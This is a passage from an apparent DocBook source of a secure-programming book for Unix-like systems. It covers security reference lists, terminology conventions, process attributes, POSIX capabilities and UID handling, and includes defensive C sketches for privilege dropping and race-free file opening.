                        The developed methodologies are applicable to both wired and wireless systems, and they are applied to some existing Internet attacks to
                        show how they can be classified under VERDICT. The methodologies are applied to the IEEE 802.11 wireless local area network protocol
                        and numerous vulnerabilities are found. Finally, an extensive annotated bibliography is included.

http://cr.yp.to/qmail/guarantee.html  Qmail
-->

</para>

<para>
For general-purpose servers and setuid/setgid programs, there are a number
of valuable documents (though some are difficult to find without
having a reference to them).
</para>


<para>
Matt Bishop [1996, 1997]
has developed several extremely valuable papers and presentations
on the topic, and in fact he has a web page dedicated to the topic at
<ulink
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>.
AUSCERT has released a programming checklist
<ulink
url="ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist">[AUSCERT 1996]</ulink>,
based in part on chapter 23 of Garfinkel and Spafford's book discussing how
to write secure SUID and network programs
<ulink
url="http://www.oreilly.com/catalog/puis">[Garfinkel 1996]</ulink>.
<ulink
url="http://www.sunworld.com/swol-04-1998/swol-04-security.html">Galvin [1998a]</ulink> described a simple process and checklist
for developing secure programs; he later updated the checklist in
<ulink
url="http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html">Galvin [1998b]</ulink>.
<ulink
url="http://www.pobox.com/~kragen/security-holes.html">Sitaker [1999]</ulink>
presents a list of issues for the ``Linux security audit'' team to search for.
<ulink
url="http://www.homeport.org/~adam/review.html">Shostack [1999]</ulink>
defines another checklist for reviewing security-sensitive code.
The NCSA
<ulink url="http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming">[NCSA]</ulink>
provides a set of terse but useful secure programming guidelines.
Other useful information sources include the
<emphasis remap="it">Secure Unix Programming FAQ</emphasis>
<ulink
url="http://www.whitefang.com/sup/">[Al-Herbish 1999]</ulink>,
the
<emphasis remap="it">Security-Audit's Frequently Asked Questions</emphasis>
<ulink
url="http://lsap.org/faq.txt">[Graham 1999]</ulink>,
and
<ulink
url="http://www.clark.net/pub/mjr/pubs/pdf/">Ranum [1998]</ulink>.
Some recommendations must be taken with caution, for example,
the BSD setuid(7) man page
<ulink
url="http://www.homeport.org/~adam/setuid.7.html">[Unknown]</ulink>
recommends the use of access(3) without noting the dangerous race conditions
that usually accompany it.
Wood [1985] has some useful but dated advice
in its ``Security for Programmers'' chapter.
<ulink
url="http://www.research.att.com/~smb/talks">Bellovin [1994]</ulink>
includes useful guidelines and some specific examples, such as how to
restructure an ftpd implementation to be simpler and more secure.
FreeBSD provides some guidelines
<ulink
url="http://www.freebsd.org/security/security.html">[FreeBSD 1999]</ulink>.
<ulink url="http://developer.gnome.org/doc/guides/programming-guidelines/book1.html">[Quintero 1999]</ulink>
is primarily concerned with GNOME programming guidelines, but it
includes a section on security considerations.
<ulink url="http://www.fish.com/security/murphy.html">[Venema 1996]</ulink>
provides a detailed discussion (with examples) of some common errors
when programming secure programs (widely-known or predictable passwords,
burning yourself with malicious data, secrets in user-accessible data,
and depending on other programs).
<ulink url="http://www.fish.com/security/maldata.html">[Sibert 1996]</ulink>
describes threats arising from malicious data.
Michael Bacarella's article
<ulink url="http://m.bacarella.com/papers/secsoft/html">
The Peon's Guide To Secure System Development</ulink>
provides a nice short set of guidelines.
</para>
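
<para>
To illustrate the caution about access(3) above: the file that
access(3) checks can be replaced (for example, through a symbolic link)
before the program opens it, so the check and the use may refer to
different files.
One commonly suggested alternative is to drop privileges temporarily
and let open(2) itself perform the permission check.
The following is a hedged sketch in C under stated assumptions:
the helper name open_as_real_user is hypothetical, it assumes the
system supports saved set-user-IDs so that seteuid(2) can restore
the original effective ID, and it does not adjust supplementary groups.
</para>
<programlisting><![CDATA[
```c
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: open PATH read-only using the real user's
   privileges, instead of calling access() and then open().
   Returns a file descriptor, or -1 on any failure. */
int open_as_real_user(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd;

    /* Drop the group first; once the effective user ID has been
       dropped we may no longer be permitted to change the group. */
    if (setegid(getgid()) != 0)
        return -1;
    if (seteuid(getuid()) != 0) {
        (void) setegid(saved_egid);
        return -1;
    }

    /* The kernel checks permissions and opens the file in one step,
       so there is no gap between the check and the use. */
    fd = open(path, O_RDONLY | O_NOCTTY);

    /* Restore privileges in the reverse order: user, then group. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0) {
        if (fd >= 0)
            (void) close(fd);
        return -1;
    }
    return fd;
}
```
]]></programlisting>
<para>
A caller would then work only with the returned descriptor
(for example, using fstat(2) on it) rather than with the path name,
since the path could be changed to refer to a different file at any time.
</para>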

<para>
There are many documents giving security guidelines for
programs using
the Common Gateway Interface (CGI) to interface with the web.
These include
<!-- ???: Re-examine this one: anything new here? -->
<ulink url="http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec">Van Biesbrouck [1996]</ulink>,
<ulink
url="http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html">Gundavaram [unknown]</ulink>,
<ulink url="http://webreview.com/wr/pub/97/08/08/bookshelf">
[Garfinkel 1997]</ulink>,
<ulink
url="http://www.eekim.com/pubs/cgibook">Kim [1996]</ulink>,
<ulink
url="http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt">Phillips [1995]</ulink>,
<ulink
url="http://www.w3.org/Security/Faq/www-security-faq.html">Stein [1999]</ulink>,
<ulink url="http://members.home.net/razvan.peteanu">[Peteanu 2000]</ulink>,
and
<ulink
url="http://advosys.ca/tips/web-security.html">[Advosys 2000]</ulink>.
</para>

<para>
There are many documents specific to a language, which are further
discussed in the language-specific sections of this book.
For example, the Perl distribution includes
<ulink url="http://www.perl.com/pub/doc/manual/html/pod/perlsec.html">
perlsec(1)</ulink>, which describes how to use Perl more securely.
The Secure Internet Programming site at
<ulink url="http://www.cs.princeton.edu/sip">http://www.cs.princeton.edu/sip</ulink>
is interested in computer security issues in general, but focuses on
mobile code systems such as Java, ActiveX, and JavaScript; Ed Felten
(one of its principals) co-wrote a book on securing Java
(<ulink url="http://www.securingjava.com">[McGraw 1999]</ulink>)
which is discussed in <xref linkend="java">.
Sun's security code guidelines, which primarily address
Java and C, are available at
<ulink url="http://java.sun.com/security/seccodeguide.html">
http://java.sun.com/security/seccodeguide.html</ulink>.
</para>

<para>
Yoder [1998] contains a collection of patterns to be used
when dealing with application security.
It's not really a specific set of guidelines, but a set of commonly-used
patterns for programming that you may find useful.
The Shmoo Group maintains a web page linking to information on
how to write secure code at
<ulink url="http://www.shmoo.com/securecode">http://www.shmoo.com/securecode</ulink>.
</para>

<para>
There are many documents describing the issue from
the other direction (i.e., ``how to crack a system'').
One example is McClure [1999], and there's a vast amount of material
from that vantage point on the Internet.
There are also more general documents on computer architectures and how
attacks must be developed to exploit them, e.g.,
[LSD 2001].
The Honeynet Project has been collecting information
(including statistics) on how attackers
actually perform their attacks; see their website at
<ulink url="http://project.honeynet.org">http://project.honeynet.org</ulink>
for more information.
</para>

<para>
There's also a large body of information on vulnerabilities
already identified in existing programs.
This can be a useful set of
examples of ``what not to do,'' though it takes effort to extract more
general guidelines from the large body of specific examples.
There are mailing lists that discuss security issues; one of the most
well-known is
<ulink url="http://SecurityFocus.com/forums/bugtraq/faq.html">
Bugtraq</ulink>, which among other things develops a list of vulnerabilities.
The CERT Coordination Center (CERT/CC)
is a major reporting center for Internet security problems which
reports on vulnerabilities.
The CERT/CC occasionally produces advisories that
provide a description of a serious security problem
and its impact, along with
instructions on how to obtain a patch or details of a workaround; for
more information see
<ulink url="http://www.cert.org">http://www.cert.org</ulink>.
Note that originally the CERT was
a small computer emergency response team, but officially
``CERT'' doesn't stand for anything now.
The Department of Energy's
<ulink url="http://ciac.llnl.gov/ciac">Computer
Incident Advisory Capability (CIAC)</ulink> also reports on vulnerabilities.
<!-- Could reference ntbugtraq and the ones listed in
    http://www.cert.org/other_sources/other_teams.html and the
    various backers of CVE -->
These different groups may identify the same vulnerabilities but use different
names.
To resolve this problem,
MITRE supports the Common Vulnerabilities and Exposures (CVE) list
which creates a single unique identifier (``name'')
for all publicly known vulnerabilities and security exposures
identified by others; see
<ulink url="http://www.cve.mitre.org">http://www.cve.mitre.org</ulink>.
NIST's ICAT
is a searchable catalog of computer vulnerabilities, categorizing
each CVE vulnerability so that they can be searched
and compared later; see
<ulink url="http://csrc.nist.gov/icat">http://csrc.nist.gov/icat</ulink>.
</para>

<para>
This book is a summary of what I believe are the most
useful and important guidelines.
My goal is a book that
a good programmer can just read and then be fairly well prepared
to implement a secure program.
No single document can really meet this goal, but
I believe the attempt is worthwhile.
My objective is to strike a balance somewhere between a
``complete list of all possible guidelines''
(that would be unending and unreadable)
and the various ``short'' lists available on-line that are nice and short
but omit a large number of critical issues.
When in doubt, I include the guidance; I believe in that case it's better
to make the information
available to everyone in this ``one stop shop'' document.
The organization presented here is my own (every list has its own, different
structure), and some of the guidelines (especially the Linux-unique
ones, such as those on capabilities and the FSUID value) are also my own.
Reading all of the referenced documents listed above as well
is highly recommended, though I realize that for many it's impractical.
</para>
</sect1>

<sect1 id="other-sources">
<title>Other Sources of Security Information</title>

<para>
There are a vast number of web sites and mailing lists dedicated to
security issues.
Here are some other sources of security information:
<itemizedlist>
<listitem><para>
<ulink url="http://www.securityfocus.com">Securityfocus.com</ulink>
has a wealth of general security-related news and information, and hosts
a number of security-related mailing lists.
See their website for information on how to subscribe and view their archives.
A few of the most relevant mailing lists on SecurityFocus are:
<itemizedlist>
<listitem><para>
The ``Bugtraq'' mailing list is, as noted above,
a ``full disclosure moderated mailing list for the detailed discussion and
announcement of computer security vulnerabilities:
what they are, how to exploit them, and how to fix them.''
</para></listitem>
<listitem><para>
The ``secprog'' mailing list is
a moderated mailing list for the discussion of secure software
development methodologies and techniques.
I specifically monitor this list, and I coordinate with its moderator
to ensure that resolutions reached in SECPROG (if I agree with them)
are incorporated into this document.
</para></listitem>
<listitem><para>
The ``vuln-dev'' mailing list discusses potential or undeveloped holes.
</para></listitem>
</itemizedlist>
</para></listitem>
<listitem><para>
IBM's ``developerWorks: Security'' has a library of interesting articles.
You can learn more from
<ulink url="http://www.ibm.com/developer/security">http://www.ibm.com/developer/security</ulink>.
</para></listitem>
<listitem><para>
For Linux-specific security information, a good source is
<ulink url="http://www.linuxsecurity.com">LinuxSecurity.com</ulink>.
If you're interested in auditing Linux code, places to see include
the <ulink url="http://www.linuxhelp.org/lsap.shtml">Linux
Security-Audit Project FAQ</ulink>
and the <ulink url="http://www.lkap.org">Linux Kernel Auditing Project</ulink>,
both of which are dedicated to auditing Linux code for security issues.
</para></listitem>
</itemizedlist>
Of course, if you're securing specific systems, you should sign up to
their security mailing lists (e.g., Microsoft's, Red Hat's, etc.)
so you can be warned of any security updates.
</para>


</sect1>

<sect1 id="conventions">
<title>Document Conventions</title>

<para>
System manual pages are referenced in the format <emphasis remap="it">name(number)</emphasis>,
where <emphasis remap="it">number</emphasis> is the section number of the manual.
The pointer value that means ``does not point anywhere'' is called NULL;
C compilers will convert the integer constant 0 to the value NULL in most circumstances
where a pointer is needed,
but note that nothing in the C standard requires that NULL actually
be implemented by a series of all-zero bits.
C and C++ treat the character '\0' (ASCII 0) specially, and this value
is referred to as NIL in this book (this is usually called ``NUL'',
but ``NUL'' and ``NULL'' sound identical).
Function and method names always use the correct case, even if that means
that some sentences must begin with a lower case letter.
I use the term ``Unix-like'' to mean Unix, Linux, or other systems whose
underlying models are very similar to Unix;
I can't say POSIX, because there are systems such as Windows 2000 that
implement portions of POSIX yet have vastly different security models.
</para>

<para>
An attacker is called an ``attacker'', ``cracker'', or ``adversary'',
and not a ``hacker''.
Some journalists mistakenly use the word ``hacker'' instead of ``attacker'';
this book avoids this misuse, because many
Linux and Unix developers refer to themselves as ``hackers''
in the traditional non-evil sense of the term.
To many Linux and Unix developers, the term ``hacker'' continues
to mean simply an expert or enthusiast, particularly regarding computers.
It is true that some hackers commit malicious or intrusive actions,
but many other hackers do not,
and it's unfair to claim that all hackers perform malicious activities.
Many other glossaries and books note that not all hackers are attackers.
For example,
the Industry Advisory Council's Information Assurance (IA)
Special Interest Group (SIG)'s
<ulink url="http://www.iaconline.org/sig_infoassure.html">
Information Assurance Glossary</ulink> defines hacker as
``A person who delights in having an intimate understanding of the
internal workings of computers and computer networks.
The term is misused in a negative context where `cracker' should be used.''
<ulink url="http://www.catb.org/~esr/jargon">The
Jargon File</ulink> has a
<ulink url="http://www.catb.org/~esr/jargon/html/entry/hacker.html">
long and complicated definition for hacker</ulink>, starting with
``A person who enjoys exploring the details of programmable systems
and how to stretch their capabilities,
as opposed to most users, who prefer to learn only the minimum necessary.'';
it notes that although some people use the term to mean
``A malicious meddler who tries to discover sensitive information
by poking around'', this definition is deprecated and
the correct term for this sense is ``cracker''.
</para>

<!-- TRANSLATORS:  FEEL FREE TO OMIT THE FOLLOWING PARAGRAPH
     (OR PORTIONS OF IT) IF IT DOES NOT APPLY TO YOUR LANGUAGE.  -->
<para>
This book uses the ``new'' or ``logical'' quoting system, instead
of the traditional American quoting system: quoted information
does not include any trailing punctuation if the punctuation
is not part of the material being quoted.
While this may cause a minor loss of typographical beauty, the traditional
American system causes extraneous characters to be placed inside the quotes.
These extraneous characters have
no effect on prose but can be disastrous in code or computer commands.
<!-- See http://www.catb.org/~esr/jargon/html/Hacker-Writing-Style.html -->
<!-- I distinguish between the terms privilege and permission in this book;
a process (subject) may acquire privileges, while an object has permissions. -->
I use standard American (not British) spelling; I've yet to meet an
English speaker on any continent who has trouble with this.
</para>

</sect1>

</chapter>

<chapter id="features">
<title>Summary of Linux and Unix Security Features</title>

<epigraph>
<attribution>Proverbs 2:11 (NIV)</attribution>
<para>
Discretion will protect you, and understanding will guard you.
</para>
</epigraph>

<para>
Before discussing guidelines on how to use Linux or Unix security features,
it's useful to know what those features are from a programmer's viewpoint.
This chapter briefly describes those features that are widely available
on nearly all Unix-like systems.
However, note that there is considerable variation between
different versions of Unix-like systems, and
not all systems have the abilities described here.
This chapter also notes some extensions or features specific to Linux;
Linux distributions tend to be fairly similar to each other from the
point-of-view of programming for security, because they all use essentially
the same kernel and C library (and the GPL-based licenses encourage rapid
dissemination of any innovations).
It also notes some of the security-relevant differences between different
Unix implementations, but please note that this isn't an exhaustive list.
This chapter doesn't discuss issues such as implementations of
mandatory access control (MAC), which many Unix-like systems do not implement.
If you already know what
those features are, please feel free to skip this chapter.
</para>

<para>
Many programming guides skim briefly over the security-relevant portions
of Linux or Unix and skip important information.
In particular, they often discuss ``how to use'' something in general terms
but gloss over the security attributes that affect their use.
Conversely, there's a great deal of detailed information in
the manual pages about individual functions, but the manual pages
sometimes obscure key security issues with detailed discussions on how
to use each individual function.
This chapter tries to bridge that gap; it gives an overview of
the security mechanisms in Linux that are likely to be used
by a programmer, concentrating specifically on the security
ramifications.
It has more depth than the typical programming guide, focuses
specifically on security-related matters, and points to references
where you can get more details.
</para>

<para>
First, the basics.
Linux and Unix are
fundamentally divided into two parts: the kernel and ``user space''.
Most programs execute in user space (on top of the kernel).
Linux supports the concept of ``kernel modules'', which is simply the
ability to dynamically load code into the kernel, but note that it
still has this fundamental division.
Some other systems (such as the HURD) are ``microkernel'' based systems; they
have a small kernel with more limited functionality, and a set of ``user''
programs that implement the lower-level functions traditionally implemented
by the kernel.
</para>

<para>
Some Unix-like systems have been extensively modified to support
strong security, in particular to support U.S. Department of Defense
requirements for Mandatory Access Control (level B1 or higher).
This version of this book doesn't cover these systems or issues;
I hope to expand to that in a future version.
More detailed information on some of them is available elsewhere, for
example, details on SGI's ``Trusted IRIX/B''
are available in NSA's
<ulink url="http://www.radium.ncsc.mil/tpep/library/fers/index.html">Final
Evaluation Reports (FERs)</ulink>.
<!-- ???: Mention trusted Unix-like systems, MAC, ACLs, Trusted Solaris -->
</para>

<para>
When users log in, their usernames are mapped to integers marking their
``UID'' (for ``user id'') and the ``GID''s (for ``group id'') that they
are a member of.
UID 0 is a special privileged user (role) traditionally called ``root'';
on most Unix-like systems (including Unix) root
can overrule most security checks and is used to administer the system.
On some Unix systems, GID 0 is also special and permits unrestricted access
to resources at the group level [Gay 2000, 228];
this isn't true on other systems (such as Linux), but even in those systems
group 0 is essentially all-powerful because so many special system files
are owned by group 0.
Processes are the only ``subjects'' in terms of security (that is, only
processes are active objects).
Processes can access various data objects, in particular filesystem
objects (FSOs), System V Interprocess Communication (IPC) objects, and
network ports.
Processes can also send signals.
Other security-relevant topics include quotas and limits, libraries,
auditing, and PAM.
The next few subsections detail this.
</para>

<sect1 id="processes">
<title>Processes</title>

<para>
In Unix-like systems,
user-level activities are implemented by running processes.
Most Unix systems support a ``thread'' as a separate concept;
threads share memory inside a process, and the system scheduler actually
schedules threads.
Linux does this differently (and in my opinion uses a better approach):
there is no essential difference between a thread and a process.
Instead, in Linux, when a process creates another process it can choose
what resources are shared (e.g., memory can be shared).
The Linux kernel then performs optimizations to get thread-level speeds;
see clone(2) for more information.
It's worth noting that the Linux kernel developers tend to use the
word ``task'', not ``thread'' or ``process'', but the external
documentation tends to use the word process
(so I'll use the term ``process'' here).
When programming a multi-threaded application,
it's usually better to use one of the standard
thread libraries that hide these differences.
Not only does this make threading more portable, but some libraries
provide an additional level of indirection, by implementing more than
one application-level thread as a single operating system thread;
this can provide some improved performance on some systems for
some applications.
</para>

<sect2 id="process-attributes">
<title>Process Attributes</title>

<para>
Here are typical attributes associated with each process in a
Unix-like system:

<itemizedlist>
<listitem>

<para>
RUID, RGID - real UID and GID
of the user on whose behalf the process is running
</para>
</listitem>
<listitem>

<para>
EUID, EGID - effective UID and GID
used for privilege checks (except for the filesystem)
</para>
</listitem>
<listitem>

<para>
SUID, SGID - Saved UID and GID;
used to support switching permissions ``on and off'' as discussed below.
Not all Unix-like systems support this, but the vast majority do
(including Linux and Solaris);
if you want to check whether a given system implements this option in the
POSIX standard, you can use sysconf(3) to determine if
_POSIX_SAVED_IDS is in effect.
</para>
</listitem>
<listitem>

<para>
supplemental groups - a list of groups (GIDs) in which this
user has membership.
In the original version 7 Unix, this didn't exist -
processes were only a member of one group at a time, and a special
command had to be executed to change that group.
BSD added support for a list of groups in each process,
which is more flexible, and
this addition is now widely implemented (including by Linux and Solaris).
</para>
</listitem>
<listitem>

<para>
umask - a set of bits determining the default access control settings
when a new filesystem object is created; see umask(2).
</para>
</listitem>
<listitem>

<para>
scheduling parameters - each process has a scheduling policy, and those
with the default policy SCHED&lowbar;OTHER have the additional parameters
nice, priority, and counter.  See sched&lowbar;setscheduler(2) for more information.
</para>
</listitem>
<listitem>

<para>
limits - per-process resource limits (see below).
</para>
</listitem>
<listitem>

<para>
filesystem root - the process' idea of where the root filesystem
("/") begins; see chroot(2).
</para>
</listitem>

</itemizedlist>

</para>
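
<para>
As a rough illustration of the attributes listed above, here is a minimal
sketch in C that reports the identity-related attributes of the calling process.
The function names current_umask() and print_process_ids() are
hypothetical names I've chosen for this example; the calls they make
(getuid(2), geteuid(2), getgid(2), getegid(2), getgroups(2), umask(2),
and sysconf(3)) are standard, but I'm assuming a system that
provides _SC_SAVED_IDS.
</para>
<programlisting><![CDATA[
```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Return the current umask.  umask(2) can only report the old mask
 * while installing a new one, so install a restrictive mask and
 * immediately restore the old value.  (Not safe if another thread
 * creates files at the same moment.) */
mode_t current_umask(void)
{
    mode_t old = umask(077);
    umask(old);
    return old;
}

/* Print the identity-related attributes of the calling process.
 * Returns the number of supplemental groups, or -1 on error. */
int print_process_ids(FILE *out)
{
    int n = getgroups(0, NULL);        /* ask how many groups exist */
    if (n < 0)
        return -1;

    gid_t *groups = malloc((n > 0 ? n : 1) * sizeof *groups);
    if (groups == NULL)
        return -1;

    n = getgroups(n, groups);          /* now fetch the actual list */
    if (n < 0) {
        free(groups);
        return -1;
    }

    fprintf(out, "RUID=%ld EUID=%ld\n", (long)getuid(), (long)geteuid());
    fprintf(out, "RGID=%ld EGID=%ld\n", (long)getgid(), (long)getegid());
    fprintf(out, "umask=%03lo\n", (unsigned long)current_umask());

    fprintf(out, "supplemental groups:");
    for (int i = 0; i < n; i++)
        fprintf(out, " %ld", (long)groups[i]);
    fprintf(out, "\n");

    /* A positive value means the saved set-user-ID option is supported. */
    fprintf(out, "saved IDs supported: %s\n",
            sysconf(_SC_SAVED_IDS) > 0 ? "yes" : "no");

    free(groups);
    return n;
}
```
]]></programlisting>
<para>
Calling print_process_ids(stdout) from an ordinary (non-setuid) program
should normally show the real and effective IDs as equal.
</para>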

<para>
Here are less-common attributes associated with processes:

<itemizedlist>
<listitem>

<para>
FSUID, FSGID - UID and GID used for filesystem access checks;
these are usually equal to the EUID and EGID respectively.
These are Linux-unique attributes.
</para>
</listitem>
<listitem>

<para>
capabilities - POSIX capability information; there are actually three
sets of capabilities on a process: the effective, inheritable, and permitted
capabilities.  See below for more information on POSIX capabilities.
Linux kernel version 2.2 and greater support this; some other Unix-like
systems do too, but it's not as widespread.
</para>
</listitem>

</itemizedlist>

</para>

<para>
In Linux,
if you really need to know exactly what attributes are associated
with each process, the most definitive source is the
Linux source code, in particular
<filename>/usr/include/linux/sched.h</filename>'s definition of task&lowbar;struct.
</para>

<para>
The portable way to create new processes is to use the fork(2) call.
BSD introduced a variant called vfork(2) as an optimization technique.
The bottom line with vfork(2) is simple: <emphasis remap="it">don't</emphasis> use it if you
can avoid it.
See <xref linkend="avoid-vfork"> for more information.
</para>

<para>
Linux supports the Linux-unique clone(2) call.
This call works like fork(2), but allows specification of which resources
should be shared (e.g., memory, file descriptors, etc.).
Various BSD systems implement an rfork() system call
(originally developed in Plan 9); it has different
semantics but the same general idea (it also creates a process with tighter
control over what is shared).
<!-- For more on a vulnerability in old versions of rfork
 (setuid/setgid programs could be controlled), see
 http://www.openbsd.org/advisories/rfork.txt -->
Portable programs shouldn't use these calls directly, if possible;
as noted earlier,
they should instead rely on threading libraries that use such
calls to implement threads.
</para>

<para>
This book is not a full tutorial on writing programs, so
I will skip widely-available information on handling processes.
You can see the documentation for wait(2), exit(2), and so on for more
information.
</para>

</sect2>

<sect2 id="posix-capabilities">
<title>POSIX Capabilities</title>

<para>
POSIX capabilities are sets of bits that permit splitting of the privileges
typically held by root into a larger set of more specific privileges.
POSIX capabilities are defined
by a draft IEEE standard; they're not unique to Linux but they're not
universally supported by other Unix-like systems either.
Linux kernel 2.0 did not support POSIX capabilities, while version 2.2
added support for POSIX capabilities to processes.
When Linux documentation (including this book)
says ``requires root privilege'', in nearly all cases it
really means ``requires a capability'' as documented in the capability
documentation.
If you need to know the specific capability required, look it up in the
capability documentation.
</para>

<para>
In Linux,
the eventual intent is to permit capabilities to be attached to files
in the filesystem; as of this writing, however, this is not yet supported.
There is support for transferring capabilities, but this is disabled
by default.
Linux version 2.2.11 added a feature that makes capabilities
more directly useful, called the ``capability bounding set''.
The capability bounding set is the list of capabilities
that any process on the system is allowed to hold (a capability outside
the set can be held only by the special init process).
If a capability does not appear in the bounding set, it may not be
exercised by any process, no matter how privileged.
This feature can be used to, for example, disable kernel module loading.
A sample tool that takes advantage of this is LCAP at
<ulink
url="http://pweb.netcom.com/~spoon/lcap/">http://pweb.netcom.com/~spoon/lcap/</ulink>.
</para>

<para>
More information about POSIX capabilities is available at
<ulink
url="ftp://linux.kernel.org/pub/linux/libs/security/linux-privs">ftp://linux.kernel.org/pub/linux/libs/security/linux-privs</ulink>.
</para>

</sect2>

<sect2 id="process-creation">
<title>Process Creation and Manipulation</title>

<para>
Processes may be created using fork(2), the non-recommended vfork(2),
or the Linux-unique clone(2); all of these system calls duplicate the existing
process, creating two processes out of it.
A process can execute a different program by calling execve(2),
or various front-ends to it (for example, see exec(3), system(3), and popen(3)).
</para>
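
<para>
The usual fork-then-exec pattern described above can be sketched as follows.
This is only an illustration under my own assumptions, not a complete
process-handling routine: run_program() is a hypothetical helper name,
and the caller is expected to supply a full pathname and an explicit
environment rather than relying on whatever was inherited.
</para>
<programlisting><![CDATA[
```c
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run the program at `path` with argument vector `argv` and the
 * explicit environment `envp`.  Returns the child's exit status
 * (0-255), or -1 if the child could not be created or did not
 * exit normally. */
int run_program(const char *path, char *const argv[], char *const envp[])
{
    pid_t pid = fork();                /* duplicate the current process */
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: replace this process image with the new program. */
        execve(path, argv, envp);
        /* execve(2) only returns on failure; leave without running
         * the parent's atexit handlers or flushing its buffers. */
        _exit(127);
    }

    /* Parent: wait for the child, retrying if a signal interrupts us. */
    int status;
    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR)
            return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```
]]></programlisting>
<para>
Using execve(2) directly, instead of a front-end such as system(3),
avoids handing the command to a shell for interpretation.
</para>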

<para>
<!-- I've known about the scripting race condition since forever, but the
     description here is vaguely derived from perlsec(1) -->
When a program is executed, and its file has its setuid or setgid bit set,
the process' EUID or EGID (respectively) is usually set to the file's value.
This functionality was the source of an old Unix security weakness
when used to support setuid or setgid scripts, due to a race condition.
Between the time the kernel opens the file to see which interpreter to run,
and when the (now-set-id) interpreter turns around and reopens
the file to interpret it, an attacker might change the file
(directly or via symbolic links).
</para>

<para>
Different Unix-like systems handle the security issue for setuid scripts
in different ways.
Some systems, such as Linux, completely ignore the setuid and setgid
bits when executing scripts, which is clearly a safe approach.
Most modern releases of SysVr4 and BSD 4.4 use a different approach to
avoid the kernel race condition.
On these systems, when the kernel passes
the name of the set-id script to open to the interpreter,
rather than using a pathname (which would permit the race condition)
it instead passes the filename /dev/fd/3.  This is a special
file already opened on the script, so that there can be no
race condition for attackers to exploit.
Even on these systems I recommend against using setuid/setgid
shell scripts for secure programs, as discussed below.
</para>


<para>
In some cases a process can affect the various UID and GID values; see
setuid(2), seteuid(2), setreuid(2), and the Linux-unique setfsuid(2).
In particular the saved user id (SUID) attribute
is there to permit trusted programs to temporarily switch UIDs.
Unix-like systems supporting the SUID use the following rules:
If the RUID is changed, or the EUID is set to a value not equal to the RUID,
the SUID is set to the new EUID.
Unprivileged users can set their EUID from their SUID,
the RUID to the EUID, and the EUID to the RUID.
<!-- ??? In FreeBSD, On execve(), the saved UID is reset to the EUID.
Source: "Advanced Unix Programming", Warren W. Gay, page 231. -->
</para>
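
<para>
To make the rules above concrete, here is a minimal sketch of how a
setuid program might temporarily switch its EUID to the RUID and later
switch back, assuming a system that supports saved user ids.
The function names drop_privileges_temporarily() and restore_privileges()
are hypothetical; the sketch relies only on getuid(2), geteuid(2), and
seteuid(2), and it deliberately ignores group ids to stay short.
</para>
<programlisting><![CDATA[
```c
#include <sys/types.h>
#include <unistd.h>

/* Temporarily give up the privileges of a setuid program by setting
 * the EUID to the RUID.  The previous EUID is stored in *old_euid;
 * on systems with saved user ids it also remains in the SUID, which
 * is what permits the later switch back.
 * Returns 0 on success, -1 on failure. */
int drop_privileges_temporarily(uid_t *old_euid)
{
    *old_euid = geteuid();
    if (seteuid(getuid()) != 0)
        return -1;
    /* Never assume the call worked; verify the result. */
    return (geteuid() == getuid()) ? 0 : -1;
}

/* Switch the EUID back to the value saved by the function above.
 * Returns 0 on success, -1 on failure. */
int restore_privileges(uid_t old_euid)
{
    if (seteuid(old_euid) != 0)
        return -1;
    return (geteuid() == old_euid) ? 0 : -1;
}
```
]]></programlisting>
<para>
In a program that is not setuid, both calls succeed but change nothing,
since the RUID, EUID, and SUID are already equal.
</para>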

<para>
The Linux-unique
FSUID process attribute is intended to permit programs like the NFS server
to limit themselves to only the filesystem rights of some given UID
without giving that UID permission to send signals to the process.
Whenever the EUID is changed, the FSUID is changed to the new
EUID value; the FSUID value can be set separately using setfsuid(2), a
Linux-unique call.
Note that non-root callers can only set FSUID to the current
RUID, EUID, SUID, or current FSUID values.
</para>

</sect2>

</sect1>

<sect1 id="files">
<title>Files</title>

<para>
On all Unix-like systems, the primary repository of information is
the file tree, rooted at ``/''.
The file tree is a hierarchical set of directories, each of which
may contain filesystem objects (FSOs).
</para>

<para>
In Linux,
filesystem objects (FSOs) may be ordinary files, directories,
symbolic links, named pipes (also called first-in first-outs or FIFOs),
sockets (see below),
character special (device) files, or block special (device) files
(in Linux, this list is given in the find(1) command).
Other Unix-like systems have an identical or similar list of FSO types.
</para>

<para>
Filesystem objects are collected on filesystems, which can be
mounted and unmounted on directories in the file tree.
A filesystem type (e.g., ext2 and FAT) is a specific set of conventions
for arranging data on the disk to optimize speed, reliability, and so on;
many people use the term ``filesystem'' as a synonym for the filesystem type.
</para>

<sect2 id="fso-attributes">
<title>Filesystem Object Attributes</title>

<para>
Different Unix-like systems support different filesystem types.
Filesystems may have slightly different sets of access control attributes
and access controls can be affected by options selected at mount time.
On Linux, the ext2 filesystem is currently the most popular filesystem,
but Linux supports a vast number of filesystems.
Most Unix-like systems tend to support multiple filesystems too.
</para>

<para>
Most filesystems on Unix-like systems store at least the following:

<itemizedlist>
<listitem>

<para>
owning UID and GID - identifies the ``owner'' of the filesystem
object.  Only the owner or root can change the access control attributes
unless otherwise noted.
</para>
</listitem>
<listitem>

<para>
permission bits -
read, write, execute bits for each of user (owner), group, and other.
For ordinary files, read, write, and execute have their typical meanings.
In directories, the ``read'' permission is necessary to display a directory's
contents, while the ``execute'' permission is sometimes called ``search''
permission and is necessary to actually enter the directory to use its contents.
``Write'' permission on a directory permits
adding, removing, and renaming files in that directory; if you only want
to permit adding, set the sticky bit noted below.
Note that the permission values of symbolic links are never used; it's only
the values of their containing directories and the linked-to file that matter.
</para>
</listitem>
<listitem>

<para>
